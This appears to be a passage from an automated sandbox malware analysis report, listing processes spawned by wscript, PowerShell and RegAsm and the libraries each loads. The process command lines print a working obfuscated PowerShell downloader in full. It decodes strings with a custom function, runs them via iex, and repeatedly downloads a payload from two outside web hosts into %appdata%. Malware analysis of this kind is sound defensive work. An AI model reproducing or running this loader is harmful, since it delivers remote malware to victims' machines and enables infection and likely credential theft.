');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptnet.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: webio.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cabinet.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vaultcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
